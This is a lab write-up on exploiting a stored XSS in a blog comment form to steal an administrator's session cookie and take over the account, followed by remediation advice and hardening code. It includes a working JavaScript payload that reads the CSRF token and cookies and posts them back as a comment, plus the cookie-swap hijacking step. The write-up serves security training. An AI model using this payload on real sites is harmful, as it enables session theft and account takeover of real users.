June 11, 2026
From Alert(1) to Admin: Exploiting Stored XSS for Session Hijacking
Iamdawoodayub
Overview
In this lab, I exploited a Stored Cross-Site Scripting (XSS) vulnerability in a blog application's comment functionality. The objective was to leverage the XSS vulnerability to obtain an administrator's session cookie and gain access to the administrator account.
This lab demonstrates how a seemingly simple XSS vulnerability can lead to full account compromise when session cookies are accessible to client-side JavaScript.
Vulnerability Identification
While reviewing the blog application, I noticed that users could submit comments through a public comment form.
After inspecting the page source, I observed that submitted comments were rendered directly within the HTML page.
To verify whether user input was properly sanitized, I submitted a basic XSS test payload:
When I revisited the blog post, the script executed in my browser, confirming that the comment body was stored and reflected unencoded: a Stored XSS vulnerability.
Initial Analysis
The application's comment form contained several parameters:
- Comment
- Name
- Website
Additionally, the page included hidden fields such as:
Since the malicious script executed in the origin of the application, inside the victim's browser, it had full access to the page DOM (including the hidden anti-CSRF token) and to any value the application exposes to authenticated users.
Most importantly, the session cookie was readable through:
document.cookie
This indicated that the session cookie had not been set with the HttpOnly flag; a cookie carrying that flag is sent by the browser but never exposed to script.
Exploitation Strategy
Instead of sending stolen cookies to an external server, I used the application's own comment functionality as the exfiltration channel. This avoids the need for any attacker-controlled infrastructure and keeps the stolen value inside the application, where I could simply read it back from the comment section.
The injected JavaScript performed the following actions:
- Waited for the page to load.
- Retrieved the CSRF token from the page.
- Read the current user's cookie.
- Submitted a new comment containing the cookie value.
When an administrator viewed the compromised blog post, the payload executed in their browser and automatically posted their session cookie back into the comment section.
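The four steps above, written out as an added example. This is not the author's payload (which is not reproduced on the page) and makes assumptions the lab page does not state: the comment form posts to /post/comment, its hidden fields are named csrf and postId, and the remaining fields are comment, name, email and website. The stealing function takes the document and fetch as parameters so the same code can be exercised outside a browser; buildInjectedComment wraps its source in a script tag to produce the text that would be submitted as the malicious comment.

```javascript
// Added example, not the original lab payload. Field names and the endpoint
// below are assumptions about the target form.
const COMMENT_ENDPOINT = "/post/comment"; // assumed

// Runs in the victim's browser once injected. `doc` is the page document and
// `fetchFn` the browser's fetch; both are parameters so the logic is testable.
// It reads the anti-CSRF token and post id from the hidden inputs, reads every
// cookie that is not HttpOnly, and posts them back as a new comment using the
// victim's own session (same-origin request, cookies attached automatically).
function stealCookieViaComment(doc, fetchFn, endpoint) {
  const hidden = (name) => doc.querySelector(`input[name="${name}"]`).value;
  const body = new URLSearchParams({
    csrf: hidden("csrf"),      // assumed hidden field name
    postId: hidden("postId"),  // assumed hidden field name
    comment: doc.cookie,       // the stolen value lands in the comment text
    name: "stolen",
    email: "stolen@example.com",
    website: "",
  });
  return fetchFn(endpoint, {
    method: "POST",
    credentials: "include",
    headers: { "Content-Type": "application/x-www-form-urlencoded" },
    body: body.toString(),
  });
}

// Produces the comment text that gets stored: a script tag that waits for the
// page to load, then calls the function above with the real globals.
function buildInjectedComment(endpoint = COMMENT_ENDPOINT) {
  const fnSource = stealCookieViaComment.toString();
  return (
    `<script>window.addEventListener("load", () => ` +
    `(${fnSource})(document, fetch, ${JSON.stringify(endpoint)}));</script>`
  );
}
```

Because the request is same-origin, the browser attaches the administrator's session cookie to the POST, so the comment is accepted under their account; the CSRF token is read from the DOM precisely because the script is already running inside that origin, which is why anti-CSRF tokens offer no protection against XSS.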
Successful Payload
Capturing the Administrator Session
After the administrator visited the blog post, a new comment appeared containing values similar to:
secret=…
session=…
The presence of the administrator's session cookie confirmed successful execution of the payload.
Session Hijacking
Using Burp Suite, I intercepted a request to my account page:
GET /my-account HTTP/2
Cookie: session=
I replaced my session value with the administrator's session identifier obtained from the comment section.
After forwarding the request, the application responded with:
Your username is: administrator
At this point, I had successfully authenticated as the administrator and completed the lab.
Root Cause
The vulnerability existed due to two security weaknesses:
1. Stored Cross-Site Scripting
User-supplied comment content was rendered without proper sanitization or output encoding.
2. Missing HttpOnly Cookie Protection
The session cookie was accessible via:
document.cookie
allowing JavaScript to read and exfiltrate authentication data.
Impact
Successful exploitation allowed:
- Execution of arbitrary JavaScript in victim browsers.
- Theft of authenticated session cookies.
- Account takeover through session hijacking.
- Administrator account compromise.
In real-world applications, this could lead to:
- Unauthorized access to sensitive information.
- Administrative actions performed by attackers.
- Privilege escalation.
- Complete application compromise.
Remediation
Organizations can mitigate this issue by:
Output Encoding
Encode user-controlled data for the context it is rendered in (HTML body, attribute, JavaScript, URL) before writing it to the page. This is the primary control: a stored comment that is encoded on output cannot become markup.
Input Validation
Validate and sanitize all user-supplied content as defence in depth. Validation alone is not a fix, since legitimate comments may need characters such as < and &, and the same data may be rendered in more than one context.
HttpOnly Cookies
Mark session cookies with:
HttpOnly
to prevent access through JavaScript. Note that this blocks cookie theft, not XSS itself: a script running in the victim's origin can still send authenticated requests on their behalf, so HttpOnly limits the blast radius rather than removing the vulnerability.
Secure Cookie Configuration
Use:
Secure
SameSite
HttpOnly
for session cookies.
Content Security Policy (CSP)
Implement a strong CSP to reduce the impact of XSS vulnerabilities. In practice that means a script-src that does not allow 'unsafe-inline' and permits only scripts carrying a per-response nonce or a known hash; the inline script stored in a comment would then be refused by the browser.
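The remediation points above as an added example, not code from the lab or from the author: an HTML output encoder shown beside the vulnerable rendering, a Set-Cookie builder that emits the recommended flags, a checker that reports which hardening attributes a Set-Cookie header is missing, and a nonce-based CSP. The cookie name, lifetime and CSP directives are illustrative choices, not values from the page.

```javascript
// Added example of the fixes discussed above; values are illustrative.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };

// Output encoding for an HTML text context. The stored comment stays text and
// can never close the element or open a <script> tag.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// What the lab did: the raw comment is concatenated into the page.
function renderCommentVulnerable(comment) {
  return `<p class="comment">${comment}</p>`;
}

// Hardened rendering: encode at the point of output.
function renderCommentSafe(comment) {
  return `<p class="comment">${escapeHtml(comment)}</p>`;
}

// Build the Set-Cookie value for a session cookie with HttpOnly, Secure and
// SameSite. Name and value are checked so a caller cannot smuggle attributes.
function buildSessionCookie(name, value, { sameSite = "Lax", maxAgeSeconds = 3600 } = {}) {
  if (!/^[A-Za-z0-9_-]+$/.test(name)) throw new Error("invalid cookie name");
  if (/[;\s,]/.test(value) || value.length === 0) throw new Error("invalid cookie value");
  return [
    `${name}=${value}`,
    "Path=/",
    `Max-Age=${maxAgeSeconds}`,
    "HttpOnly",
    "Secure",
    `SameSite=${sameSite}`,
  ].join("; ");
}

// Check a Set-Cookie header (e.g. captured in Burp) and list the missing
// hardening attributes. An empty array means all three are present.
function missingCookieFlags(setCookieHeader) {
  const attrs = setCookieHeader
    .split(";")
    .slice(1) // drop the name=value pair
    .map((a) => a.trim().toLowerCase());
  const missing = [];
  if (!attrs.includes("httponly")) missing.push("HttpOnly");
  if (!attrs.includes("secure")) missing.push("Secure");
  if (!attrs.some((a) => a.startsWith("samesite="))) missing.push("SameSite");
  return missing;
}

// A CSP that refuses inline scripts: only <script nonce="..."> elements whose
// nonce matches the one generated for this response will execute.
function buildCsp(nonce) {
  return `default-src 'self'; script-src 'self' 'nonce-${nonce}'; object-src 'none'; base-uri 'self'`;
}
```

Running missingCookieFlags over the Set-Cookie header observed in the lab would have reported HttpOnly as missing before any payload was written, which is a quick check worth making on every session cookie during a test.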
Key Lessons Learned
This lab highlights an important distinction:
Many testers stop after triggering an alert box, but real-world impact comes from demonstrating what an attacker can achieve after gaining JavaScript execution.
In this case, Stored XSS was escalated into full administrator account takeover through session theft and session hijacking.
Understanding the post-exploitation impact of XSS is essential for both penetration testers and security professionals.